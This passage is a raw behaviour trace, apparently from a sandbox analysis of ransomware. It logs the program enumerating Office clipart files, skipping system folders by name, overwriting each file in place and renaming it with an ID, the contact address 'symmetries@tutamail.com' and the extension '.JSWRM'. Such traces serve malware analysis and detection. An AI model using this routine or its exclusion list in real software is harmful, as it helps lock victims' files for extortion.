CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386270.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386270.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0090.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0090.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386270.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386270.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386270.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0090.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0090.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0090.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0090.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386270.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.719] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15171) returned 1 [0090.720] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b40) returned 0x24d210 [0090.720] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3b40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3b40, lpOverlapped=0x0) returned 1 [0090.723] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.723] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3b40, lpOverlapped=0x0) returned 1 [0090.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.723] CloseHandle (hObject=0x314) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0090.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0090.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0090.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0090.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0090.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0090.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386270.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386270.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0090.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0090.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0090.724] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x396a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0386485.JPG", cAlternateFileName="")) returned 1 [0090.724] lstrcmpiW (lpString1="J0386485.JPG", lpString2=".") returned 1 [0090.724] lstrcmpiW (lpString1="J0386485.JPG", lpString2="..") returned 1 [0090.724] lstrcmpiW (lpString1="J0386485.JPG", lpString2="...") returned 1 [0090.724] lstrcmpiW (lpString1="J0386485.JPG", lpString2="windows") returned -1 [0090.724] lstrcmpiW (lpString1="J0386485.JPG", lpString2="recovery") returned -1 [0090.725] lstrcmpiW (lpString1="J0386485.JPG", lpString2="perflogs") returned -1 [0090.725] lstrcmpiW (lpString1="J0386485.JPG", lpString2="documents and settings") returned 1 [0090.725] lstrcmpiW (lpString1="J0386485.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.725] lstrcmpiW (lpString1="J0386485.JPG", lpString2="system volume information") returned -1 [0090.725] lstrcmpiW (lpString1="J0386485.JPG", lpString2="msocache") returned -1 [0090.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0090.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386485.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386485.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386485.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0090.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386485.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386485.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386485.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0090.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0090.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0090.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0090.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386485.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.725] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14698) returned 1 [0090.725] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3960) returned 0x24d210 [0090.726] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3960, lpOverlapped=0x0) returned 1 [0090.729] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.729] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3960, lpOverlapped=0x0) returned 1 [0090.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.729] CloseHandle (hObject=0x314) returned 1 [0090.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0090.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0090.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0090.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0090.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0090.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0090.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.730] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386485.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386485.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0090.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0090.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0090.730] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x693e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0386764.JPG", cAlternateFileName="")) returned 1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2=".") returned 1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="..") returned 1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="...") returned 1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="windows") returned -1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="recovery") returned -1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="perflogs") returned -1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="documents and settings") returned 1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="system volume information") returned -1 [0090.731] lstrcmpiW (lpString1="J0386764.JPG", lpString2="msocache") returned -1 [0090.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0090.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386764.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386764.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386764.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0090.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0090.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386764.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386764.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386764.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0090.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0090.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0090.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0090.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386764.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.732] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26942) returned 1 [0090.732] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6930) returned 0x24d210 [0090.732] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6930, lpOverlapped=0x0) returned 1 [0090.736] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.736] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6930, lpOverlapped=0x0) returned 1 [0090.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.736] CloseHandle (hObject=0x314) returned 1 [0090.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0090.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0090.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0090.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0090.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0090.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0090.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.737] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386764.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386764.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0090.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0090.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0090.738] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb0a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0387337.JPG", cAlternateFileName="")) returned 1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2=".") returned 1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="..") returned 1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="...") returned 1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="windows") returned -1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="recovery") returned -1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="perflogs") returned -1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="documents and settings") returned 1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="system volume information") returned -1 [0090.738] lstrcmpiW (lpString1="J0387337.JPG", lpString2="msocache") returned -1 [0090.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0090.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387337.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387337.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387337.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0090.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0090.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387337.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387337.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387337.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0090.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0090.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0090.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0090.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387337.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 